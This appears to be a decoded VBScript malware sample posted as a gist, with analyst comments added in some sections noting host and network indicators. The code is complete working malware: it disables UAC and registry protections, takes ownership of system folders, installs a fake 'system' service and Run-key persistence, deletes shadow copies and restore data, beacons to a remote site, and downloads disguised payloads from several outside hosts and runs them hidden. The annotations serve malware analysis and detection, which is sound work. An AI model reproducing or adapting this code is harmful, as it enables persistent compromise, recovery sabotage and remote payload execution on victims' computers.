@JohnHammond
Last active January 8, 2021 18:30
decoded_blood.dat
''''''
'''''' ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
'''''' ||| v 39.13 ¤ B0t |||
'''''' ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
''''''
' /\
' Analyst note: from this point every runtime error is silently ignored, so a
' failed registry read or write below never produces a visible error dialog.
On Error Resume Next
' 5-second delay before any further activity.
wscript.sleep 5000
' /\
'---------------------------------------------------------------------------
' ??????????????? |3yP4ss wscript t!m30ut !!!!!!!!!!!!!!!!! '
'---------------------------------------------------------------------------
'
Dim oShell
'
Dim wscr,rr
Set wscr=CreateObject("WScript.Shell")
' Read the per-user Windows Script Host "Timeout" setting. A value >= 1 means
' a script time limit is configured for this user.
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout")
If (rr>=1) Then
'
Set oShell = WScript.CreateObject ("WScript.Shell")
' Runs cmd.exe with window style 0 (hidden). The command line writes
' DisableRegistryTools=0 and WSH Timeout=0 under HKCU, then launches this same
' script again with "start". Nothing in this branch ends the current instance.
' Detection: a wscript.exe -> cmd.exe -> reg.exe chain that sets the WSH
' Settings\Timeout value is a host indicator for this sample.
oShell.run "cmd /K REG ADD ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v DisableRegistryTools /t REG_DWORD /d 0 /f & reg add ""HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings"" /v Timeout /t reg_dword /d 0 /f & start "&wscript.Scriptname&" & exit",0
Set oShell = Nothing
'
Else
End If
'
'-----------------------------------------------------------------------
' ~VAR~ !
'-----------------------------------------------------------------------
'
Dim oFS, NomFichier
Set oFS = CreateObject("Scripting.FileSystemObject")
NomFichier = oFS.GetAbsolutePathName(""&wscript.Scriptname&"")
nom = wscript.Scriptname
Set oFS = Nothing
'
Set fsO = CreateObject("Scripting.FileSystemObject")
Set WSSH = CreateObject("Wscript.shell")
Set wshshell=createobject("wscript.shell")
dema=wshshell.expandenvironmentstrings("%allusersprofile%")
sys=wshshell.expandenvironmentstrings("%systemroot%")
var1=wshshell.expandenvironmentstrings("%systemdrive%") ' R00T + TMP
MyF = ""&var1&"\security\blood.dat"
'
Dim shell
Set shell = WScript.CreateObject("WScript.Shell")
Set wscr = CreateObject("WScript.Shell")
'
'---------------------------------------------------------------------------
' servi off | on
'---------------------------------------------------------------------------
'
' Returns TRUE when WMI reports a Win32_Service named strServiceName in state
' 'Running' on strComputer, FALSE otherwise.
'   strComputer    - host to query ("." is used by the callers in this file)
'   strServiceName - service name; concatenated unescaped into the WQL text
' NOTE(review): an identical definition of this function appears again later
' in the file.
Function isServiceRunning(strComputer,strServiceName)
Dim objWMIService, strWMIQuery
strWMIQuery = "Select * from Win32_Service Where Name = '" & strServiceName & "' and state='Running'"
' Connect to the root\cimv2 WMI namespace with impersonation.
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
' Any matching row means the service is running.
If objWMIService.ExecQuery(strWMIQuery).Count > 0 Then
isServiceRunning = TRUE
Else
isServiceRunning = FALSE
End If
End Function
'option explicit
' "Already installed" guard: the script quits early only when every check
' below succeeds. The artifacts it tests are useful host indicators:
'   - a running service named "system"
'   - registry value ...\policies\explorer\sdate\sdate >= 39
'   - at least two wscript.exe processes
'   - <var1>\security\svchost.exe and <sys>\system32\system\msg\config.txt
' var1 and sys are assigned earlier in the file from %systemdrive% and
' %systemroot%.
Dim strComputer,strServiceName
strComputer = "." ' Local Computer
strServiceName = "system" ' Windows Service
If isServiceRunning(strComputer,strServiceName) Then
' Version marker; the same value is written with "39" later in this file.
ab = wscr.RegRead("HKLM\software\microsoft\windows\currentversion\policies\explorer\sdate\sdate")
If (ab >= 39) Then 'Last version
Set objWMI = GetObject("winmgmts:root\cimv2")
sQuery = "Select * from Win32_process Where Name = 'wscript.exe'"
' Two or more wscript.exe processes: this instance plus at least one other.
if objWMI.execquery(sQuery).Count >= 2 Then
set fsO = CreateObject("Scripting.FileSystemObject")
If fsO.FileExists(""&var1&"\security\svchost.exe") Then
If fsO.FileExists(""&sys&"\system32\system\msg\config.txt") Then
' All markers present: exit without repeating the installation steps.
wscript.quit
Else
End If
End If
End If
End If
End If
'
'---------------------------------------------------------------------------
' CMD = on
'---------------------------------------------------------------------------
'
Dim objShell
Dim strMessage, welcome, goodbye
'
' Set the string values
welcome = "DisableCMD" ' New Key
goodbye = "HKCU\SOFTWARE\Policies\" _
& "Microsoft\Windows\System\"
'
' Create the Shell object
Set objShell = CreateObject("WScript.Shell")
'
' These are the two crucial command in this script.
objShell.RegWrite goodbye & welcome, 0, "REG_DWORD"
'
'---------------------------------------------------------------------------
' UAC = 0 + REG = 1
'---------------------------------------------------------------------------
'
Set wscr = CreateObject("WScript.Shell")
ab = wscr.RegRead("HKLM\software\microsoft\windows\currentversion\policies\system\EnableLUA")
If (err.number <> 0 Or ab = 1) Then
Const ForReading = 1 , ForWriting = 2 , ForAppending = 8
tmpdir=shell.ExpandEnvironmentStrings("%temp%")
nomfichhh=tmpdir & "\uac.bat"
' msgbox nomfic
Set fsO = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(nomfichhh, ForWriting , true)
'
f.writeline "@echo off"
f.writeline "mode con lines=1 cols=14"
f.writeline "ver | find /i ""version 6.1."" > nul"
f.writeline "if %errorlevel%==0 GoTo patch"
f.writeline "ver | find /i ""version 6.0."" > nul"
f.writeline "if %errorlevel%==0 GoTo patch"
f.writeline ":exit"
f.writeline "exit"
f.writeline ":patch"
f.writeline "if exist ""%temp%\ADMIN.vbe"" del /q /s /f ""%temp%\ADMIN.vbe"" > nul "
f.writeline "if exist ""%temp%\CPBA.bat"" del /q /s /f ""%temp%\CPBA.bat"" > nul "
'
f.writeline "echo Set objshell = createobject(""shell.application"") > ""%temp%\ADMIN.vbe"" "
f.writeline "echo Set fsO = createobject(""scripting.filesystemobject"") >> ""%temp%\ADMIN.vbe"" "
f.writeline "echo strpath = fso.getparentfoldername(wscript.scriptfullname) >> ""%temp%\ADMIN.vbe"" "
f.writeline "echo objshell.shellexecute ""cmd.exe"", ""/c"" ^& Chr(34) ^& strpath ^& ""\CPBA.bat"" ^& Chr(34), """", ""runas"", 0 >> ""%temp%\ADMIN.vbe"" "
f.writeline "echo wscript.sleep 1000 >> ""%temp%\ADMIN.vbe"" "
' reg = on
f.writeline "echo On Error Resume Next >> ""%temp%\tp.vbe"" "
f.writeline "echo WScript.CreateObject(""WScript.Shell"").RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"",0, ""REG_DWORD"" >> ""%temp%\tp.vbe"" "
f.writeline "echo ""%temp%\tp.vbe"" >> ""%temp%\CPBA.bat"" "
f.writeline "echo del/f/q ""%temp%\tp.vbe"" >> ""%temp%\CPBA.bat"" "
'
f.writeline "echo REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v rescue /d """""""""&dema&"\rescue.vbe"""""""" >> ""%temp%\CPBA.bat"" "
f.writeline "echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f ^> nul >> ""%temp%\CPBA.bat"" "
f.writeline "echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f ^> nul >> ""%temp%\CPBA.bat"" "
f.writeline "start """" /wait ""%temp%\ADMIN.vbe"" "
f.writeline " reg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua | find /i ""0x0"" >nul "
f.writeline " If %errorlevel%==0 GoTo ok "
f.writeline " start """"/wait/MAX ""%temp%\uac.bat"" "
f.writeline ":ok"
f.writeline "if exist ""%temp%\ADMIN.vbe"" del /q /s /f ""%temp%\ADMIN.vbe"" > nul "
f.writeline "if exist ""%temp%\CPBA.bat"" del /q /s /f ""%temp%\CPBA.bat"" > nul "
f.writeline "EXIT"
f.close
'
Set variable = createobject("wscript.shell")
variable.run ""&nomfichhh&"" ,0,true
'effacer le tmp
fso.DeleteFile nomfichhh, TRUE
End If
'
'---------------------------------------------------------------------------
' 0wn3r
'---------------------------------------------------------------------------
'
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K takeown /F %systemdrive%\kernel /A /R /D O & CACLS %systemdrive%\Kernel /E /T /C /G %username%:F & takeown /F %systemdrive%\security /A /R /D O & CACLS %systemdrive%\security /E /T /C /G %username%:F & takeown /F ""%allusersprofile%\"" /A /R /D O & takeown /a /f %SystemRoot%\System32\wscript.exe & ICACLS %SystemRoot%\System32\wscript.exe /Grant %username%:F & takeown /F ""%systemdrive%\system Volume Information"" /A /R /D O & CACLS ""%systemdrive%\system Volume Information"" /E /T /C /G %username%:F & EXIT",0
Set oShell = Nothing
'
'---------------------------------------------------------------------------
' Install me
'---------------------------------------------------------------------------
'
WScript.CreateObject("Wscript.shell").regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr", 0, "REG_DWORD"
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"
'
tmpdir=shell.ExpandEnvironmentStrings("%temp%")
nomfic=tmpdir & "\tmp.bat"
' msgbox nomfic
Set fsO = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(nomfic, ForWriting , true)
'
f.writeline "for /f ""delims="" %%i in 'type """&var1&"\security\blood.dat""') do set /a Compt+=1 "
f.writeline "if '%Compt%' GEQ '24' goto exitt " ' sup ou egal
f.writeline "reg add ""HKCR\VBEFile\DefaultIcon"" /v """" /t ""REG_SZ"" /d ""%SystemRoot%\system32\shell32.dll,1"" /f"
f.writeline "xcopy /C /H /Y /R """&var1&"\kernel\*.vbe"" ""%temp%\"" "
f.writeline "xcopy /C /H /Y /R """&NomFichier&""" ""%temp%\"" "
f.writeline "attrib -s -h ""%temp%\"&nom&""" "
f.writeline "if Not exist ""%temp%\"&nom&""" GoTo Exit "
'
f.writeline "for %%E In (B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( del/f/q/A %%E:\config.dat ) "
f.writeline "md """&var1&"\Kernel"" " ' R00t3r
f.writeline "md """&var1&"\Kernel\\lpt1\\"" " ' NO DEATH dir
f.writeline "md """&var1&"\security"" " 'TMP
f.writeline "md """&var1&"\security\\lpt1\\"" " ' Idem
'
f.writeline "attrib +s +h """&var1&"\security"" "
f.writeline "attrib +s +h """&var1&"\kernel"" "
f.writeline "del/f/q/a """&var1&"\security\*.*"" "
f.writeline "del/f/q/a """&var1&"\kernel\*.*"" "
f.writeline "xcopy /C /H /Y /R ""%temp%\"&nom&""" """&var1&"\security\"" "
f.writeline "xcopy /C /H /Y /R ""%temp%\"&nom&""" """&var1&"\kernel\"" "
f.writeline "del/f/q/a ""%temp%\"&nom&" "
f.writeline "ren """&var1&"\kernel\"&nom&""" r00t3r" 'r00t
f.writeline "ren """&var1&"\security\"&nom&""" blood.dat "
f.writeline "attrib +s +h """&var1&"\kernel\r00t3r"" "
'
f.writeline ":exit"
'
f.writeline "cd /d %windir%\wbem"
f.writeline "for %i in (*.dll) Do RegSvr32 -s %i"
f.writeline "for %i in (*.exe) Do %i /RegServer"
f.writeline "EXIT"
f.writeline ":exitt"
f.close
'
set variable = createobject("wscript.shell")
variable.run ""&nomfic&"" ,0,true
'effaces le tmp
fso.DeleteFile nomfic, TRUE
'---------------------------------------------------------------------------
' R00t3r
'---------------------------------------------------------------------------
'
Set WshShell = Wscript.CreateObject("Wscript.shell")
rep=wshshell.expandenvironmentstrings("%systemdrive%")
drv=wshshell.expandenvironmentstrings("%systemroot%")
'
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&drv&"\system32\wscript.exe",""&rep&"\security\svchost.exe"
'
'---------------------------------------------------------------------------
'
tmpdir=shell.ExpandEnvironmentStrings("%systemdrive%")
nomfichhh=tmpdir & "\security\system.vbs"
' msgbox nomfic
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(nomfichhh, ForWriting , true)
'
f.writeline " Set variable=createobject(""wscript.shell"") "
f.writeline " variable.run ""svchost.exe /e:VBScript.Encode """""&tmpdir&"\security\blood.dat"",false "
f.close
WScript.CreateObject("WScript.Shell").RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\rescue",""""&dema&"\rescue.vbe""", "REG_SZ"
Set WshShell = Wscript.CreateObject("Wscript.shell")
drv=wshshell.expandenvironmentstrings("%systemroot%")
Set oShell = WScript.CreateObject ("WScript.Shell")
'
oShell.run "cmd /K md %systemroot%\system32\system & md %systemroot%\system32\system\msg & EXIT",0
Set oShell = Nothing
wscript.sleep 3000
Set WshShell = Wscript.CreateObject("Wscript.shell")
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /u /K ( @echo DisplayName=msg&@echo Description=Description&@echo ServiceType=272& echo WaitActive=0&@echo StartType=2&@echo ErrorControl=1&@echo Source=%systemdrive%\security\system.vbs&@echo ResetPeriod=0&@echo RebootMsg=&@echo Command=&@echo nActions=0&@ echo Actions=&@echo StartAtTime=OneTime) > %systemroot%\system32\system\msg\config.txt & EXIT",0
Set oShell = Nothing
'
'----------------------------------------------------------------------------
'
' Returns TRUE when WMI reports a Win32_Service named strServiceName in state
' 'Running' on strComputer, FALSE otherwise.
'   strComputer    - host to query ("." is used by the callers in this file)
'   strServiceName - service name; concatenated unescaped into the WQL text
' NOTE(review): this repeats a definition of the same function found earlier
' in the file.
Function isServiceRunning(strComputer,strServiceName)
Dim objWMIService, strWMIQuery
strWMIQuery = "Select * from Win32_Service Where Name = '" & strServiceName & "' and state='Running'"
' Connect to the root\cimv2 WMI namespace with impersonation.
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
' Any matching row means the service is running.
if objWMIService.ExecQuery(strWMIQuery).Count > 0 Then
isServiceRunning = TRUE
else
isServiceRunning = FALSE
end If
End Function
' Embedded-payload extraction: the script reads its own file and rebuilds a
' binary from hex text stored in it.
' drv is assigned earlier in the file from %systemroot%, so the output path is
' %systemroot%\system32\system\svchost.exe, a directory that does not hold
' the genuine svchost.exe. That path is a host indicator.
Dim fso, f, f2, ts, ts2
Dim Ligne, i
Set FSO = CreateObject("Scripting.FileSystemObject")
' Open the running script itself for reading (1 = ForReading, -2 = system
' default encoding).
Set f = fso.GetFile(WScript.ScriptFullName)
Set ts = f.OpenAsTextStream(1, -2)
' Create the output file, then reopen it for writing (2 = ForWriting).
fso.CreateTextFile ""&drv&"\system32\system\svchost.exe"
Set f2 = fso.GetFile(""&drv&"\system32\system\svchost.exe")
Set ts2 = f2.OpenAsTextStream(2, -2)
' Skip the first 28 lines of the script file.
For i=1 To 28
ts.skipline
Next
' Decode every remaining line: starting at character 2, each two-character
' group is parsed as a hex byte ("&h" prefix) and written out.
' NOTE(review): the first character of each line is skipped, presumably
' because payload lines start with a comment apostrophe. Those lines are not
' part of this decoded listing, so confirm against the original sample.
Do
Ligne = ts.readline
For i=2 To Len(Ligne) Step 2
ts2.write chr( "&h" & mid(Ligne,i,2))
Next
Loop Until ts.AtEndOfStream
ts.Close
ts2.Close
'option explicit
' Service persistence. When no service named "system" is running, a hidden
' cmd.exe (window style 0) does three things:
'   - sc create system, binPath "%systemroot%\System32\system\svchost.exe msg",
'     start= auto
'   - net start system
'   - sc description system, using French text that describes the service as
'     a generic Windows process which other services depend on
' Detection: an auto-start service named "system" whose image path points
' into System32\system\ is a host indicator for this sample.
strComputer = "." ' Local Computer
strServiceName = "system" ' Service N4m3
If isServiceRunning(strComputer,strServiceName) Then
Else
Set wshshell=createobject("wscript.shell")
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K sc create system binPath= ""%systemroot%\System32\system\svchost.exe msg"" start= auto & net start system & sc description system "" processus générique de Windows .Si ce service est arrêté,les services qui en dépendent ne pourront pas démarrer et votre systeme risque 'etre endommagé. "" & EXIT",0
Set oShell = Nothing
End If
' Version marker "39" (REG_SZ). The early-exit guard near the top of the file
' reads this same value and compares it with 39.
WScript.CreateObject("WScript.Shell").RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate\sdate","39", "REG_SZ"
'
'---------------------------------------------------------------------------
' S3lf D3f3ns3
'---------------------------------------------------------------------------
' /%\
'
Dim strRoot, strDelete
strRoot = "HKEY_CLASSES_ROOT\lnkfile\IsShortCut"
' Create the Shell object
Set objShell = CreateObject("WScript.Shell")
strDelete = objShell.RegDelete(strRoot)
'
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Applications\Notepad2.exe\shell\open\command", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ"
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open\command", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ"
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Batfile\Shell\Edit\Command\", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ"
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\VBEFile\Shell\Edit\Command\", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ"
'
' \%/
'
'---------------------------------------------------------------------------
' CL34R 0|_|)
'---------------------------------------------------------------------------
'
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K del/f/q/s %systemdrive%\security\system.bat & del/f/q/s %systemdrive%\security\system.vbe & del/f/q/s %systemdrive%\security\index.exe & del/f/q/s %systemdrive%\security\system.exe & del/f/q/s %systemdrive%\kernel\explorer.exe & del/f/q/s %systemdrive%\kernel\update.exe & del/f/q/s ""%temp%\reskp.exe"" & rd/q/s %systemdrive%\system32 & rd/q/s %systemdrive%\system & EXIT",0
Set oShell = Nothing
'
'---------------------------------------------------------------------------
' ResKp /\
'---------------------------------------------------------------------------
'
r00t=shell.ExpandEnvironmentStrings("%Allusersprofile%")
bkdr=r00t & "\rescue.vbe"
Set fsO = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(bkdr, ForWriting , true)
f.writeline " On Error Resume Next "
f.writeline " wscript.sleep 300000 " ' 5 min
f.writeline " Set variable=createobject(""wscript.shell"") "
f.writeline " variable.run ""%systemroot%\system32\wscript.exe /e:VBScript.Encode """""&var1&"\kernel\r00t3r"",false "
f.writeline " wscript.sleep 300000 " '5min
f.writeline " Set shell = WScript.CreateObject(""WScript.Shell"") "
f.writeline " Set WshShell = Wscript.CreateObject(""Wscript.shell"") "
f.writeline " tmpdir=shell.ExpandEnvironmentStrings(""%temp%"") "
f.writeline " Set wshshell=createobject(""wscript.shell"") "
f.writeline " mane = ""http://sauvegarde.1x.biz/"" "
f.writeline " yow = ""booter."" "
f.writeline " fin = ""dat"" "
f.writeline " strFileURL = "" ""&mane&""""&yow&""""&fin&"" "" "
f.writeline " strHDLocation = tmpdir & ""\booter.dat"" "
f.writeline " Set objXMLHTTP = CreateObject(""MSXML2.XMLHTTP"") "
f.writeline " objXMLHTTP.open ""GET"", strFileURL, FALSE "
f.writeline " objXMLHTTP.send() "
f.writeline " If objXMLHTTP.Status = 200 Then "
f.writeline " Set objADOStream = _ "
f.writeline " CreateObject(""ADODB.Stream"") "
f.writeline " objADOStream.Open "
f.writeline " objADOStream.Type = 1 'adTypeBinary "
f.writeline " objADOStream. _ "
f.writeline " Write _ "
f.writeline " objXMLHTTP _ "
f.writeline " .ResponseBody "
f.writeline " objADOStream. _ "
f.writeline " Position = 0 "
f.writeline " Set objFSO = _ "
f.writeline " Createobject(""Scripting.FileSystemObject"") "
f.writeline " If objFSO. _ "
f.writeline " Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation "
f.writeline " Set objFSO = Nothing "
f.writeline " objADOStream _ "
f.writeline " .SaveToFile strHDLocation "
f.writeline " objADOStream.Close "
f.writeline " Set objADOStream = Nothing "
f.writeline " End If "
f.writeline " a = objXMLHTTP.getResponseHeader(""Content-Length"") "
f.writeline " Set objXMLHTTP = Nothing "
'msgbox"2"
f.writeline " Set loFSO = CreateObject(""Scripting.FileSystemObject"") "
f.writeline " loFSO.CopyFile """"&tmpdir&""\booter.dat"",""""&tmpdir&""\reskp.exe"" "
f.writeline " loFSO.DeleteFile """"&tmpdir&""\booter.dat"" "
f.writeline " Set oFSO = CreateObject(""Scripting.FileSystemObject"") "
f.writeline " stFichier = """"&tmpdir&""\reskp.exe"" "
f.writeline " Set oFl = oFSO.GetFile(stFichier) "
f.writeline " b = oFl.size "
f.writeline " If """"&a&"""" = """"&b&"""" Then "
f.writeline " Set variable=createobject(""wscript.shell"") "
f.writeline " variable.run """"""""&tmpdir&""\reskp.exe"""""",0,False "
f.writeline " Else "
f.writeline " End If "
f.close
'--------------------------------------------------------------------------
' Restaur 0 xp () 7v
'--------------------------------------------------------------------------
' /\
' Recovery inhibition: this section tampers with System Restore and deletes
' Volume Shadow Copies. Both are high-signal events for detection and should
' be alerted on whatever the parent process is.
On Error Resume Next
' \/
Drive = "" ' all drives'
' Call Disable and then Enable on the SystemRestore WMI class with an empty
' drive string.
' NOTE(review): presumably done to discard existing restore points; confirm
' on the target OS version.
Set obj = GetObject("winmgmts:{impersonationLevel=impersonate}!root/default:SystemRestore")
ret=obj.Disable(Drive)
Set obj = GetObject("winmgmts:{impersonationLevel=impersonate}!root/default:SystemRestore")
ret=obj.Enable(Drive)
ret=obj.Enable(Drive)
Set obj = Nothing
'
Set wshshell=createobject("wscript.shell")
Set oShell = WScript.CreateObject ("WScript.Shell")
' Hidden cmd.exe (window style 0): deletes all shadow copies quietly with
' vssadmin, then force-deletes the contents of "System Volume Information" on
' the system drive.
oShell.run "cmd /K vssadmin delete shadows /all /quiet & cd/d ""%systemdrive%\system volume Information"" & del/f/s/q/a ""%systemdrive%\system volume Information\*.*"" & EXIT",0
Set oShell = Nothing
'
'---------------------------------------------------------------------------
' \/\/0Rm_._S4t/\N
'---------------------------------------------------------------------------
'
prem = TotalTime
deux = Start
dern = PauseTime
'
While TRUE
dern = 3600 ' Déclenchement / 1H'
deux = Timer ' H début.
Do While Timer < deux + dern
'
detecterracines
wscript.sleep 1000
'
Loop
'LANCEMENT
'
'---------------------------------------------------------------------------
' C0mPtM3 & Def3nd3r m!
'---------------------------------------------------------------------------
'
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 2, "REG_DWORD"
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
'
On Error Resume Next
Set xmlHttp = CreateObject("MSXML2.ServerXMLHTTP")
urlCert = "http://registered.co.nf/sat39/index.php"
xmlHttp.Open "GET", urlCert, FALSE
xmlHttp.Send ""
xmlHttp.Abort
'
'---------------------------------------------------------------------------
' Z0n3H
'---------------------------------------------------------------------------
'
' Download-and-run stage. It sits inside the enclosing While TRUE loop, after
' the wait loop that uses dern = 3600 seconds. The same fetch, rename and run
' sequence is repeated further down for other hosts and file names.
' Indicators in this stage:
'   network: plain-HTTP GET for a ".dat" file from the host below
'   host:    <var1>\security\zoneh.dat renamed to zoneh.exe, run hidden
' var1 is assigned earlier in the file from %systemdrive%.
Set wshshell=createobject("wscript.shell")
first = "http://zoneh.me.pn/"
secon = "zoneh."
ext = "dat"
' URL and local path are assembled from fragments rather than written whole.
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\security\"
strHDLocation = ""&third&""&secon&""&ext&""
' Synchronous GET (third argument FALSE).
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
' On HTTP 200, write the raw response body to disk through ADODB.Stream in
' binary mode, replacing any existing file at the target path.
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
' Keep the advertised size so it can be compared with the size on disk below.
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
' Copy the download to an .exe name and delete the .dat original.
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&third&"zoneh.dat",""&third&"zoneh.exe"
loFSO.DeleteFile ""&third&"zoneh.dat"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"zoneh.exe"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
' The only check before execution is Content-Length against file size. That
' catches a truncated transfer and says nothing about what the file contains.
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
' Window style 0 (hidden), no wait for completion.
variable.run """"&var1&"\security\zoneh.exe""",0,False
Else
End If
'
'---------------------------------------------------------------------------
' BUMP
'---------------------------------------------------------------------------
'
Set wshshell=createobject("wscript.shell")
first = "http://users2.Jabry.com/mysiteweb2/"
secon = "bump."
ext = "jpg"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\security\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&third&"bump.jpg",""&third&"bump.vbe"
loFSO.DeleteFile ""&third&"bump.jpg"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"bump.vbe"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\security\bump.vbe""",0,False
Else
End If
'---------------------------------------------------------------------------
' AV 0
'---------------------------------------------------------------------------
'
Set wshshell=createobject("wscript.shell")
first = "http://newsonline.125mb.com/"
secon = "av."
ext = "jpg"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\security\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&third&"av.jpg",""&third&"av.bat"
loFSO.DeleteFile ""&third&"av.jpg"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"av.bat"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\security\av.bat""",0,False
Else
End If
'
'---------------------------------------------------------------------------
' system . x
'---------------------------------------------------------------------------
Set wshshell=createobject("wscript.shell")
first = "http://mysiteweb.eu5.org/"
secon = "system."
ext = "jpg"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\security\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
